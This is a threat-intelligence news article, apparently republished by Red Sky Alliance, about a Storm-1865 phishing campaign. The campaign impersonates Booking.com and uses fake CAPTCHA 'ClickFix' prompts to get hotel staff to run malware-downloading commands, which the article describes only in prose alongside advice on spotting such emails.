If you are looking to plan a future vacation, take a minute to scrutinize hotel and travel service booking sites. Hotel and hostel workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking[.]com. In a phishing campaign that began in December 2024 and continued through February, the threat actors are targeting people in the hospitality industry across North America, Southeast Asia and Europe who are likely to work with Booking[.]com and to open emails from the travel platform.
A report from Microsoft published on 13 March tracked a technique called “ClickFix” where hackers try to “take advantage of human problem-solving tendencies by displaying fake error messages or prompts that instruct target users to fix issues by copying, pasting, and launching commands that eventually result in the download of malware. This need for user interaction could allow an attack to slip through conventional and automated security features,” Microsoft said. “In the case of this phishing campaign, the user is prompted to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the phishing page adds to the clipboard.” The researchers tied the campaign to the group Storm-1865, which has launched several other phishing campaigns that involve stealing payment data and making fraudulent charges.
The malicious emails included a variety of content, with some referencing bad guest reviews, account verification or demands from potential guests. Most of the emails include a link or a PDF attachment purportedly taking victims to Booking[.]com. When clicked, victims are taken to a fake CAPTCHA page where the ClickFix scheme is deployed. “This technique instructs the user to use a keyboard shortcut to open a Windows Run window, then paste and launch a command that the webpage adds to the clipboard,” the researchers said, noting that from there malware is downloaded on victim devices.
Microsoft found several different strains of malware deployed on victim devices, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot and NetSupport RAT. All of the malware strains allow the hackers to steal financial information and credentials.
A spokesperson for Booking[.]com said the “actual numbers of accommodations affected by this scam are a small fraction of those on our platform” and the company has made “significant investments to limit the impact” on their customers and partners. “While we can confirm that Booking[.]com’s systems have not been breached, we are aware that unfortunately some of our accommodation partners and customers have been impacted by phishing attacks sent by professional criminals, with the criminal intent of taking over their local computer systems with malware,” the spokesperson said.
Microsoft noted that Storm-1865 targeted hotel guests in 2023 using another Booking.com lure, and in 2024 it attacked e-commerce customers with phishing messages. These campaigns have increased in volume since early 2023, Microsoft said.
*** The tech giant urged hospitality workers to always check a sender’s email address, to search for typos in emails and to be wary of any messages requiring them to take an action.
This article is shared at no charge for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com
Weekly Cyber Intelligence Briefings:
• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122
Comments